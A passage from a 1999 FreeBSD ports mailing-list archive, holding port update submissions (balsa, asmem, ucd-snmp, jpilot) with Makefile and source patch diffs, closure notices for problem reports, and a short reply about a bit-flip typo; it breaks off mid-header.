mail/balsa/pkg/PLIST --- /usr/ports/mail/balsa/pkg/PLIST Sun May 30 19:45:17 1999 +++ mail/balsa/pkg/PLIST Fri Dec 24 22:33:06 1999 @@ -2,19 +2,41 @@ etc/CORBA/servers/balsa.gnorba etc/sound/events/balsa.soundlist etc/sound/events/email.soundlist -lib/libbalsasrv.a -share/gnome/pixmaps/balsa/attachment.png -share/gnome/pixmaps/balsa/balsa_icon.png -share/gnome/pixmaps/balsa/balsa_logo.png +share/gnome/gnome/help/balsa/C/g327.htm +@exec ln -sf t1.htm %D/share/gnome/gnome/help/balsa/C/index.html +@unexec rm -f %D/share/gnome/gnome/help/balsa/C/index.html +share/gnome/gnome/help/balsa/C/t1.htm +share/gnome/gnome/help/balsa/C/topic.dat +share/gnome/gnome/help/balsa/C/x188.htm +share/gnome/gnome/help/balsa/C/x24.htm +share/gnome/gnome/help/balsa/C/x244.htm +share/gnome/gnome/help/balsa/C/x277.htm +share/gnome/gnome/help/balsa/C/x324.htm +share/gnome/gnome/help/balsa/C/x35.htm +share/gnome/idl/balsa.idl +share/gnome/pixmaps/balsa/attachment.png +share/gnome/pixmaps/balsa/balsa-logo.png +share/gnome/pixmaps/balsa/balsa-top.png +share/gnome/pixmaps/balsa/balsa-watermark.png +share/gnome/pixmaps/balsa/balsa_icon.png +share/gnome/pixmaps/balsa/balsa_logo.png share/gnome/sounds/balsa/newmail.wav share/gnome/sounds/balsa/startup.wav +share/locale/da/LC_MESSAGES/balsa.mo share/locale/de/LC_MESSAGES/balsa.mo share/locale/es/LC_MESSAGES/balsa.mo +share/locale/et/LC_MESSAGES/balsa.mo share/locale/fi/LC_MESSAGES/balsa.mo share/locale/fr/LC_MESSAGES/balsa.mo share/locale/ga/LC_MESSAGES/balsa.mo share/locale/it/LC_MESSAGES/balsa.mo share/locale/ko/LC_MESSAGES/balsa.mo +share/locale/nl/LC_MESSAGES/balsa.mo share/locale/no/LC_MESSAGES/balsa.mo +share/locale/pl/LC_MESSAGES/balsa.mo +share/locale/pt_BR/LC_MESSAGES/balsa.mo +share/locale/ru/LC_MESSAGES/balsa.mo @dirrm share/gnome/sounds/balsa @dirrm share/gnome/pixmaps/balsa +@dirrm share/gnome/gnome/help/balsa/C +@dirrm share/gnome/gnome/help/balsa >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 10: 5:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from dan.emsphone.com (dan.emsphone.com [199.67.51.101]) by hub.freebsd.org (Postfix) with ESMTP id 6565A15145; Fri, 24 Dec 1999 10:05:05 -0800 (PST) (envelope-from dan@dan.emsphone.com) Received: (from dan@localhost) by dan.emsphone.com (8.9.3/8.9.3) id MAA38631; Fri, 24 Dec 1999 12:04:57 -0600 (CST) (envelope-from dan) Date: Fri, 24 Dec 1999 12:04:57 -0600 From: Dan Nelson To: FreeBSD Cc: "freebsd-stable@FreeBSD. ORG" , freebsd-current@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG Subject: Re: broken port... Message-ID: <19991224120457.A38490@dan.emsphone.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from "FreeBSD" on Fri Dec 24 00:11:34 GMT 1999 X-OS: FreeBSD 4.0-CURRENT Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the last episode (Dec 24), FreeBSD said: > cute one though > > Updater failed: Cannot install > "/usr/ports/japanese/tk80/patches/#cvs.cvsup-1394.186" to > "/usr/pobts/japanese/tk80/patches/patch-ab": No such file or directory > > /usr/pobts :) You didn't provide much information, but it looks like you were running cvsup, right? If you run it again, does it have trouble on the same file? 'b' and 'r' are one bit apart from each other (01100010 and 01110010). Sounds like your machine flipped a bit. -- Dan Nelson dnelson@emsphone.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 10:48:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C254B158CC; Fri, 24 Dec 1999 10:48:19 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA83462; Fri, 24 Dec 1999 10:48:19 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 10:48:19 -0800 (PST) From: Message-Id: <199912241848.KAA83462@freefall.freebsd.org> To: reg@shale.csir.co.za, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14759: Many minor port clean-ups Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Many minor port clean-ups State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 10:48:06 PST 1999 State-Changed-Why: Changes committed, Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 10:50:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EBC2F15208; Fri, 24 Dec 1999 10:50:45 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA83663; Fri, 24 Dec 1999 10:50:45 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 10:50:45 -0800 (PST) From: Message-Id: <199912241850.KAA83663@freefall.freebsd.org> To: reg@shale.csir.co.za, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14761: More minor port clean-ups Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: More minor port clean-ups State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 10:50:34 PST 1999 State-Changed-Why: committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11: 0: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2CFB315234 for ; Fri, 24 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA84270; Fri, 24 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from germanium.xtalwind.net (germanium.xtalwind.net [205.160.242.5]) by hub.freebsd.org (Postfix) with ESMTP id 58AF114E1C for ; Fri, 24 Dec 1999 10:56:12 -0800 (PST) (envelope-from jack@germanium.xtalwind.net) Received: (from jack@localhost) by germanium.xtalwind.net (8.10.0.Beta10/8.10.0.Beta10) id dBOIu2p99079; Fri, 24 Dec 1999 13:56:02 -0500 (EST) Message-Id: <199912241856.dBOIu2p99079@germanium.xtalwind.net> Date: Fri, 24 Dec 1999 13:56:02 -0500 (EST) From: jack@germanium.xtalwind.net Reply-To: jack@germanium.xtalwind.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15668: Update port: sysutils/asmem Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15668 >Category: ports >Synopsis: Update port: sysutils/asmem >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 11:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: >Release: FreeBSD 3.4-RELEASE i386 >Organization: >Environment: >Description: Update sysutils/asmem from version 1.4 to 1.5 I am the maintainer. >How-To-Repeat: >Fix: diff -ruN asmem/Makefile asmem.new/Makefile --- asmem/Makefile Mon Sep 27 16:36:18 1999 +++ asmem.new/Makefile Fri Dec 24 13:54:49 1999 @@ -1,11 +1,11 @@ # New ports collection makefile for: asfsm -# Version required: asmem-1.2 +# Version required: asmem-1.5 # Date created: 4 June 1999 # Whom: jack # # $FreeBSD: ports/sysutils/asmem/Makefile,v 1.5 1999/09/27 02:15:50 steve Exp $ -DISTNAME= asmem-1.4 +DISTNAME= asmem-1.5 CATEGORIES= sysutils afterstep MASTER_SITES= ftp://ftp.afterstep.org/apps/asmem/ \ http://www.bewoner.dma.be/Albert/software/ diff -ruN asmem/files/md5 asmem.new/files/md5 --- asmem/files/md5 Mon Sep 27 16:36:18 1999 +++ asmem.new/files/md5 Fri Dec 17 14:49:01 1999 @@ -1 +1 @@ -MD5 (asmem-1.4.tar.gz) = ab70ebed017ef5ebf92b0706d924a4d0 +MD5 (asmem-1.5.tar.gz) = 059cb8834917d29999038c2d2e32330b >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:13:50 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 43DD914BE9; Fri, 24 Dec 1999 11:13:48 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA85491; Fri, 24 Dec 1999 11:13:48 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 11:13:48 -0800 (PST) From: Message-Id: <199912241913.LAA85491@freefall.freebsd.org> To: alex@big.endian.de, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15564: update games/blue to 2.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update games/blue to 2.4 State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 11:13:39 PST 1999 State-Changed-Why: Updated, thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:19: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0603714E84; Fri, 24 Dec 1999 11:19:05 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA86028; Fri, 24 Dec 1999 11:19:04 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 11:19:04 -0800 (PST) From: Message-Id: <199912241919.LAA86028@freefall.freebsd.org> To: igor@zynaps.ru, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15438: p5-GD port update (1.18 -> 1.23) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: p5-GD port update (1.18 -> 1.23) State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 11:18:56 PST 1999 State-Changed-Why: Committed, thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:22:46 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A8264157BA; Fri, 24 Dec 1999 11:22:17 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA86293; Fri, 24 Dec 1999 11:22:17 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 11:22:17 -0800 (PST) From: Message-Id: <199912241922.LAA86293@freefall.freebsd.org> To: mharo@FreeBSD.org, freebsd-ports@FreeBSD.org, nsayer@FreeBSD.org Subject: Re: ports/15027: libmcrypt's distfiles should be updated Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: libmcrypt's distfiles should be updated Responsible-Changed-From-To: freebsd-ports->nsayer Responsible-Changed-By: mharo Responsible-Changed-When: Fri Dec 24 11:22:00 PST 1999 Responsible-Changed-Why: Over to MAINTAINER To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:29:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A712F14C48; Fri, 24 Dec 1999 11:29:20 -0800 (PST) (envelope-from mharo@FreeBSD.org) Received: (from mharo@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA86925; Fri, 24 Dec 1999 11:29:20 -0800 (PST) (envelope-from mharo@FreeBSD.org) Date: Fri, 24 Dec 1999 11:29:20 -0800 (PST) From: Message-Id: <199912241929.LAA86925@freefall.freebsd.org> To: jabley@patho.gen.nz, mharo@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14963: update for current sox port to include GSM support Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update for current sox port to include GSM support State-Changed-From-To: open->closed State-Changed-By: mharo State-Changed-When: Fri Dec 24 11:28:13 PST 1999 State-Changed-Why: Support added Next time you do a diff, do diff -u You did this backwards for this PR, but I reversed it back. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:50: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2BC6714F94 for ; Fri, 24 Dec 1999 11:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA88338; Fri, 24 Dec 1999 11:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from germanium.xtalwind.net (germanium.xtalwind.net [205.160.242.5]) by hub.freebsd.org (Postfix) with ESMTP id 6D43914D3F for ; Fri, 24 Dec 1999 11:44:18 -0800 (PST) (envelope-from jack@germanium.xtalwind.net) Received: (from jack@localhost) by germanium.xtalwind.net (8.10.0.Beta10/8.10.0.Beta10) id dBOJiAT42146; Fri, 24 Dec 1999 14:44:10 -0500 (EST) Message-Id: <199912241944.dBOJiAT42146@germanium.xtalwind.net> Date: Fri, 24 Dec 1999 14:44:10 -0500 (EST) From: jack@germanium.xtalwind.net Reply-To: jack@germanium.xtalwind.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15669: Unbreak ucd-snmp for current Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15669 >Category: ports >Synopsis: Unbreak ucd-snmp for current >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 11:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: >Release: FreeBSD 3.4-RELEASE i386 >Organization: >Environment: >Description: Merger vendor patches to handle new VM system on current. This should allow most FreeBSD patches to go away in the next vendor release. Add autoconf BUILD_DEPENDS Set myself as maintainer per Gary Palmer, previou maintainer. >How-To-Repeat: >Fix: diff -ruN ucd-snmp/Makefile ucd-snmp.new/Makefile --- ucd-snmp/Makefile Mon Nov 15 16:49:54 1999 +++ ucd-snmp.new/Makefile Tue Dec 7 21:55:43 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: ucd-snmp -# Version required: 3.6.1 +# Version required: 4.0.1 # Date created: 26 June 1996 # Whom: gpalmer # @@ -15,10 +15,12 @@ PATCHFILES= 012.patch PATCH_DIST_STRIP= -p0 -d ${WRKSRC}/agent -MAINTAINER= gpalmer@FreeBSD.org +MAINTAINER= jack@germanium.xtalwind.net CONFIGURE_ARGS= --enable-shared +BUILD_DEPENDS= autoheader:${PORTSDIR}/devel/autoconf + GNU_CONFIGURE= YES .if defined(BATCH) CONFIGURE_ARGS+= --with-defaults --with-sys-contact=nobody@no.where @@ -45,15 +47,9 @@ .if ${PORTOBJFORMAT} == "aout" BROKEN= "aout build breaks: ld: internal error: RRS relocs exceed allocation 343" .endif -.if ${OSVERSION} >= 400000 -BROKEN= "Uses the old VM system interfaces" -.endif SHLIB_VERSION=4 PLIST_SUB= shlib=${SHLIB_VERSION} - -post-patch: - @${CP} ${FILESDIR}/freebsd4.h ${WRKSRC}/s post-install: @( cd ${PREFIX}/bin && strip ${BIN} ) diff -ruN ucd-snmp/files/freebsd4.h ucd-snmp.new/files/freebsd4.h --- ucd-snmp/files/freebsd4.h Wed Apr 7 12:07:40 1999 +++ ucd-snmp.new/files/freebsd4.h Wed Dec 31 19:00:00 1969 @@ -1 +0,0 @@ -#include "freebsd3.h" diff -ruN ucd-snmp/patches/patch-ab ucd-snmp.new/patches/patch-ab --- ucd-snmp/patches/patch-ab Wed Apr 7 12:07:40 1999 +++ ucd-snmp.new/patches/patch-ab Wed Dec 31 19:00:00 1969 @@ -1,40 +0,0 @@ ---- agent/mibgroup/ucd-snmp/disk.c~ Fri Mar 5 08:45:00 1999 -+++ agent/mibgroup/ucd-snmp/disk.c Sat Apr 3 13:33:11 1999 -@@ -79,6 +79,7 @@ - #define statvfs statfs - #endif - #if HAVE_VM_SWAP_PAGER_H -+#include - #include - #endif - #if HAVE_SYS_FIXPOINT_H ---- agent/mibgroup/ucd-snmp/errormib.c~ Tue Mar 2 05:27:30 1999 -+++ agent/mibgroup/ucd-snmp/errormib.c Sat Apr 3 13:33:44 1999 -@@ -93,6 +93,7 @@ - #define statvfs statfs - #endif - #if HAVE_VM_SWAP_PAGER_H -+#include - #include - #endif - #if HAVE_SYS_FIXPOINT_H ---- agent/mibgroup/ucd-snmp/extensible.c~ Fri Mar 5 08:45:01 1999 -+++ agent/mibgroup/ucd-snmp/extensible.c Sat Apr 3 13:34:13 1999 -@@ -81,6 +81,7 @@ - #define statvfs statfs - #endif - #if HAVE_VM_SWAP_PAGER_H -+#include - #include - #endif - #if HAVE_SYS_FIXPOINT_H ---- agent/mibgroup/ucd-snmp/loadave.c~ Tue Mar 16 08:21:02 1999 -+++ agent/mibgroup/ucd-snmp/loadave.c Sat Apr 3 13:34:39 1999 -@@ -80,6 +80,7 @@ - #define statvfs statfs - #endif - #if HAVE_VM_SWAP_PAGER_H -+#include - #include - #endif - #if HAVE_SYS_FIXPOINT_H diff -ruN ucd-snmp/patches/patch-ad ucd-snmp.new/patches/patch-ad --- ucd-snmp/patches/patch-ad Wed Apr 7 12:07:40 1999 +++ ucd-snmp.new/patches/patch-ad Tue Dec 7 21:55:43 1999 @@ -1,12 +1,36 @@ ---- agent/mibgroup/mibII/interfaces.c~ Tue Mar 16 08:46:12 1999 -+++ agent/mibgroup/mibII/interfaces.c Sat Apr 3 13:49:28 1999 -@@ -1745,10 +1745,18 @@ +--- agent/mibgroup/mibII/interfaces.c.orig Thu Aug 19 05:33:56 1999 ++++ agent/mibgroup/mibII/interfaces.c Tue Dec 7 17:27:21 1999 +@@ -12,10 +12,12 @@ + #define _I_DEFINED_KERNEL + #endif + +-#if STDC_HEADERS +-#include ++#if HAVE_STRING_H + #include + #endif ++#if HAVE_STDLIB_H ++#include ++#endif + #if HAVE_UNISTD_H + #include + #endif +@@ -118,7 +120,7 @@ + #if HAVE_SYS_SYSCTL_H + #include + +-#if defined(freebsd3) ++#if defined(freebsd3) || defined(freebsd4) + # define USE_SYSCTL_IFLIST + #else + # if defined(CTL_NET) && !defined(freebsd2) +@@ -1832,10 +1834,18 @@ physaddrbuf = 0; } ifm = (struct if_msghdr *)rtm; +#if defined(freebsd3) || defined(freebsd4) -+ if (physaddrs != 0) physaddrs[naddrs] = (void*)(ifm + 1); -+ naddrs++; ++ if (physaddrs != 0) physaddrs[naddrs] = (void*)(ifm + 1); ++ naddrs++; +#endif ilen -= ifm->ifm_msglen; cp += ifm->ifm_msglen; @@ -19,7 +43,7 @@ int is_alias = 0; ifam = (struct ifa_msghdr *)rtm; ilen -= sizeof(*ifam); -@@ -1771,6 +1779,7 @@ +@@ -1858,6 +1868,7 @@ } sa = (struct sockaddr *)cp; } @@ -27,3 +51,27 @@ rtm = (struct rt_msghdr *)cp; } } +--- agent/mibgroup/mibII/tcp.c.orig Wed Aug 18 12:30:37 1999 ++++ agent/mibgroup/mibII/tcp.c Tue Dec 7 17:24:23 1999 +@@ -135,6 +135,10 @@ + #ifdef linux + static void linux_read_tcp_stat (struct tcp_mib *); + #endif ++#ifdef freebsd4 ++static unsigned int hz; ++#endif ++ + + /********************* + * +@@ -185,7 +189,9 @@ + #ifdef TCP_SYMBOL + auto_nlist( TCP_SYMBOL,0,0 ); + #endif +- ++#if freebsd4 ++ hz=sysconf(_SC_CLK_TCK); /* get ticks/s from system */ ++#endif + } + + /* diff -ruN ucd-snmp/patches/patch-ai ucd-snmp.new/patches/patch-ai --- ucd-snmp/patches/patch-ai Wed Dec 31 19:00:00 1969 +++ ucd-snmp.new/patches/patch-ai Tue Dec 7 21:55:43 1999 @@ -0,0 +1,22 @@ +--- acconfig.h.orig Mon Aug 23 09:14:37 1999 ++++ acconfig.h Tue Dec 7 16:35:28 1999 +@@ -282,7 +282,7 @@ + #ifdef netbsd1 + #define OSTYPE NETBSD1ID + #endif +-#if defined(freebsd2) || defined(freebsd3) ++#if defined(freebsd2) || defined(freebsd3) || defined(freebsd4) + #define OSTYPE FREEBSDID + #endif + #if defined(irix6) || defined(irix5) +--- config.h.in.orig Mon Aug 23 09:14:38 1999 ++++ config.h.in Tue Dec 7 16:52:22 1999 +@@ -803,7 +803,7 @@ + #ifdef netbsd1 + #define OSTYPE NETBSD1ID + #endif +-#if defined(freebsd2) || defined(freebsd3) ++#if defined(freebsd2) || defined(freebsd3) || defined(freebsd4) + #define OSTYPE FREEBSDID + #endif + #if defined(irix6) || defined(irix5) diff -ruN ucd-snmp/patches/patch-aj ucd-snmp.new/patches/patch-aj --- ucd-snmp/patches/patch-aj Wed Dec 31 19:00:00 1969 +++ ucd-snmp.new/patches/patch-aj Tue Dec 7 21:55:43 1999 @@ -0,0 +1,17 @@ +--- ./s/freebsd4.h Thu Nov 4 09:48:40 1999 ++++ ./s/freebsd4.h Thu Nov 4 09:00:18 1999 +@@ -0,0 +1,14 @@ ++#include "freebsd.h" ++ ++#define freebsd2 1 /* freebsd3 is a superset of freebsd2 */ ++ ++#undef IFADDR_SYMBOL ++#define IFADDR_SYMBOL "in_ifaddrhead" ++ ++#undef PROC_SYMBOL ++#define PROC_SYMBOL "allproc" ++ ++#undef NPROC_SYMBOL ++#define NPROC_SYMBOL "nprocs" ++ ++#undef TOTAL_MEMORY_SYMBOL diff -ruN ucd-snmp/patches/patch-ak ucd-snmp.new/patches/patch-ak --- ucd-snmp/patches/patch-ak Wed Dec 31 19:00:00 1969 +++ ucd-snmp.new/patches/patch-ak Tue Dec 7 21:55:43 1999 @@ -0,0 +1,48 @@ +--- agent/mibgroup/ucd-snmp/disk.c.orig Tue Aug 24 17:17:32 1999 ++++ agent/mibgroup/ucd-snmp/disk.c Tue Dec 7 18:51:52 1999 +@@ -82,6 +82,9 @@ + #endif + #define statvfs statfs + #endif ++#if HAVE_VM_VM_H ++#include ++#endif + #if HAVE_VM_SWAP_PAGER_H + #include + #endif +--- agent/mibgroup/ucd-snmp/errormib.c.orig Wed Aug 18 12:30:44 1999 ++++ agent/mibgroup/ucd-snmp/errormib.c Tue Dec 7 18:52:51 1999 +@@ -92,6 +92,9 @@ + #endif + #define statvfs statfs + #endif ++#if HAVE_VM_VM_H ++#include ++#endif + #if HAVE_VM_SWAP_PAGER_H + #include + #endif +--- agent/mibgroup/ucd-snmp/loadave.c.orig Tue Jul 27 09:38:09 1999 ++++ agent/mibgroup/ucd-snmp/loadave.c Tue Dec 7 18:54:42 1999 +@@ -79,6 +79,9 @@ + #endif + #define statvfs statfs + #endif ++#if HAVE_VM_VM_H ++#include ++#endif + #if HAVE_VM_SWAP_PAGER_H + #include + #endif +--- agent/mibgroup/ucd-snmp/extensible.c.orig Tue Jul 27 09:38:08 1999 ++++ agent/mibgroup/ucd-snmp/extensible.c Tue Dec 7 19:09:56 1999 +@@ -80,6 +80,9 @@ + #endif + #define statvfs statfs + #endif ++#if HAVE_VM_VM_H ++#include ++#endif + #if HAVE_VM_SWAP_PAGER_H + #include + #endif >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 11:53:50 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3360F14F94; Fri, 24 Dec 1999 11:53:46 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA88652; Fri, 24 Dec 1999 11:53:46 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Fri, 24 Dec 1999 11:53:46 -0800 (PST) From: Message-Id: <199912241953.LAA88652@freefall.freebsd.org> To: jack@germanium.xtalwind.net, billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15669: Unbreak ucd-snmp for current Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Unbreak ucd-snmp for current State-Changed-From-To: open->feedback State-Changed-By: billf State-Changed-When: Fri Dec 24 11:51:50 PST 1999 State-Changed-Why: These are not all the correct changes. 016.patch exists to fix some of the problems, and should be used instead of patches/patch-* Also, some recent changes were checked in to ucd-snmp to make it even smarter about swap space. I know, I wrote them. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 12: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 56CC115209 for ; Fri, 24 Dec 1999 12:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA89053; Fri, 24 Dec 1999 12:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from snapple.webct.com (snapple.webct.com [209.87.17.45]) by hub.freebsd.org (Postfix) with ESMTP id 384A515225 for ; Fri, 24 Dec 1999 11:55:45 -0800 (PST) (envelope-from varju@snapple.webct.com) Received: (from root@localhost) by snapple.webct.com (8.9.3/8.9.3) id LAA44669; Fri, 24 Dec 1999 11:55:43 -0800 (PST) (envelope-from varju) Message-Id: <199912241955.LAA44669@snapple.webct.com> Date: Fri, 24 Dec 1999 11:55:43 -0800 (PST) From: Alex Varju Reply-To: varju@snapple.webct.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15670: jpilot port update Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15670 >Category: ports >Synopsis: port update for palm/jpilot >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 24 12:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alex Varju >Release: FreeBSD 4.0-CURRENT i386 >Organization: WebCT, Inc. >Environment: >Description: Update of port palm/jpilot to version 0.97 >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /webct2/Admin/cvsroot/ports/palm/jpilot/Makefile,v retrieving revision 1.6 diff -u -w -r1.6 Makefile --- Makefile 1999/11/11 22:40:39 1.6 +++ Makefile 1999/12/24 19:47:40 @@ -7,7 +7,7 @@ # # "?=" and "+=" are for including this Makefile from japanese/jpilot -DISTNAME= jpilot-0.96 +DISTNAME= jpilot-0.97 CATEGORIES= palm comms MASTER_SITES= http://jpilot.linuxbox.com/ Index: files/md5 =================================================================== RCS file: /webct2/Admin/cvsroot/ports/palm/jpilot/files/md5,v retrieving revision 1.5 diff -u -w -r1.5 md5 --- files/md5 1999/12/09 15:56:05 1.5 +++ files/md5 1999/12/24 19:14:25 @@ -1 +1 @@ -MD5 (jpilot-0.96.tar.gz) = 02791ca8ecf8801fc190adb2af8f736f +MD5 (jpilot-0.97.tar.gz) = db31cf7de1b7a93add662f295c04def2 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 12:10:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2540D15412 for ; Fri, 24 Dec 1999 12:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA89481; Fri, 24 Dec 1999 12:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from 